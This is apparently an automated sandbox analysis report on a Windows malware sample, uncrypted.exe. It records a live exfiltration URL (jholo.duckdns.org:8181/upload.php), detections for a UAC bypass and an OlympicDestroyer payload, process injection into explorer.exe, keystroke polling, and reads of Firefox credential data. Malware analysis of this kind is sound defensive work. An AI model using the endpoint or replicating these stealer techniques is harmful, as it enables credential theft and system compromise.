                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/l
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/llu
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/n
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084150348.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085034739.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084288266.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.php
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.php8
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.phpcp=
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.phphic
                    Source: explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.phporage
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/upload.phpy=part
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00413200 GetAsyncKeyState,Sleep,2_2_00413200
                    Source: explorer.exe, 00000003.00000002.3291834167.0000000003600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ENCMARK RegisterRawInputDevicesmemstr_130513a5-d

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.explorer.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00410D50 Wow64DisableWow64FsRedirection,_memset,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,Wow64DisableWow64FsRedirection,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection,2_2_00410D50
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,3_2_011A0740
                    Source: C:\Windows\explorer.exeCode function: 3_2_01197940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,3_2_01197940
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,3_2_011A11A4
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_01210D580_2_01210D58
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_01210D4F0_2_01210D4F
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_012113290_2_01211329
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004268E42_2_004268E4
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004258F72_2_004258F7
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0042612A2_2_0042612A
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0040E1E02_2_0040E1E0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0043127F2_2_0043127F
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00432BE42_2_00432BE4
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004264FC2_2_004264FC
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00430D2E2_2_00430D2E
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00425D8C2_2_00425D8C
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0041BEE02_2_0041BEE0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00431EAC2_2_00431EAC
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0041BF392_2_0041BF39
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004317D02_2_004317D0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011910003_2_01191000
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B23403_2_011B2340
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A9D203_2_011A9D20
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A07403_2_011A0740
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AD6003_2_011AD600
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B5E503_2_011B5E50
                    Source: C:\Windows\explorer.exeCode function: 3_2_011979403_2_01197940
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BF9643_2_011BF964
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BE9BC3_2_011BE9BC
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AD0303_2_011AD030
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119B8B03_2_0119B8B0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119E8C03_2_0119E8C0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119A8C03_2_0119A8C0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011C3B2C3_2_011C3B2C
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B23B63_2_011B23B6
                    Source: C:\Windows\explorer.exeCode function: 3_2_011C53F83_2_011C53F8
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119CBF03_2_0119CBF0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A12B03_2_011A12B0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B9D1C3_2_011B9D1C
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AA5103_2_011AA510
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AC5013_2_011AC501
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AAD503_2_011AAD50
                    Source: C:\Windows\explorer.exeCode function: 3_2_01194DA03_2_01194DA0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BCC2C3_2_011BCC2C
                    Source: C:\Windows\explorer.exeCode function: 3_2_011C5C5C3_2_011C5C5C
                    Source: C:\Windows\explorer.exeCode function: 3_2_011AC4803_2_011AC480
                    Source: C:\Windows\explorer.exeCode function: 3_2_011C67083_2_011C6708
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B27903_2_011B2790
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119DE203_2_0119DE20
                    Source: C:\Windows\explorer.exeCode function: 3_2_011A26903_2_011A2690
                    Source: C:\Windows\explorer.exeCode function: 3_2_01197EF03_2_01197EF0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E710004_2_00E71000
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E792B04_2_00E792B0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E733A04_2_00E733A0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E754C04_2_00E754C0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E76D604_2_00E76D60
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F080904_2_00F08090
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F301904_2_00F30190
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E861804_2_00E86180
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F183B04_2_00F183B0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F313704_2_00F31370
                    Source: C:\Windows\explorer.exeCode function: 4_2_00EFA3004_2_00EFA300
                    Source: C:\Windows\explorer.exeCode function: 4_2_00EA04904_2_00EA0490
                    Source: C:\Windows\explorer.exeCode function: 4_2_00EF64004_2_00EF6400
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3D5A84_2_00F3D5A8
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3A5644_2_00F3A564
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E765304_2_00E76530
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E7A6904_2_00E7A690
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F307F04_2_00F307F0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3B73C4_2_00F3B73C
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F0271A4_2_00F0271A
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3A9E44_2_00F3A9E4
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F319804_2_00F31980
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E8DB404_2_00E8DB40
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F2FCE04_2_00F2FCE0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F35CE04_2_00F35CE0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F34C844_2_00F34C84
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E7ADF04_2_00E7ADF0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F33DA04_2_00F33DA0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00EA3DB04_2_00EA3DB0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00EFEDB04_2_00EFEDB0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F0FD604_2_00F0FD60
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E75D004_2_00E75D00
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F30EB04_2_00F30EB0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F01E7F4_2_00F01E7F
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3AFD04_2_00F3AFD0
                    Source: C:\Windows\explorer.exeCode function: String function: 00EC3BD0 appears 137 times
                    Source: C:\Windows\explorer.exeCode function: String function: 011B84A8 appears 48 times
                    Source: C:\Windows\explorer.exeCode function: String function: 00E85B10 appears 59 times
                    Source: C:\Windows\explorer.exeCode function: String function: 00EA2F20 appears 47 times
                    Source: uncrypted.exe, 00000000.00000002.2050791832.000000000109E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uncrypted.exe
                    Source: uncrypted.exe, 00000000.00000000.2031882370.00000000009A9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFour.exeL vs uncrypted.exe
                    Source: uncrypted.exeBinary or memory string: OriginalFilenameFour.exeL vs uncrypted.exe
                    Source: uncrypted.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.explorer.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: uncrypted.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@7/2@3/1
                    Source: C:\Windows\explorer.exeCode function: 3_2_01191BA0 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,3_2_01191BA0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00407280 _memset,_memset,CoCreateInstance,_memset,__snwprintf,_memset,2_2_00407280
                    Source: C:\Users\user\Desktop\uncrypted.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uncrypted.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\uncrypted.exeMutant created: \Sessions\1\BaseNamedObjects\{BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                    Source: C:\Users\user\Desktop\uncrypted.exeMutant created: \Sessions\1\BaseNamedObjects\{CCDA2DA7-D4F8-4F83-BFB6-45A8FDBB92EB}
                    Source: C:\Users\user\Desktop\uncrypted.exeMutant created: \Sessions\1\BaseNamedObjects\{254EC4A5-B06F-451B-BA3F-2BA8CE48C450}
                    Source: C:\Users\user\Desktop\uncrypted.exeMutant created: \Sessions\1\BaseNamedObjects\{56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DATABASEJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: uncrypted.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: uncrypted.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: explorer.exe, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: explorer.exe, 00000003.00000002.3291834167.0000000003600000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2059308070.000000000343A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: explorer.exe, 00000004.00000003.2060274019.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2060991623.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2060460027.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2061349534.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2061440789.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, DATABASE.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: uncrypted.exeVirustotal: Detection: 61%
                    Source: uncrypted.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\uncrypted.exeFile read: C:\Users\user\Desktop\uncrypted.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
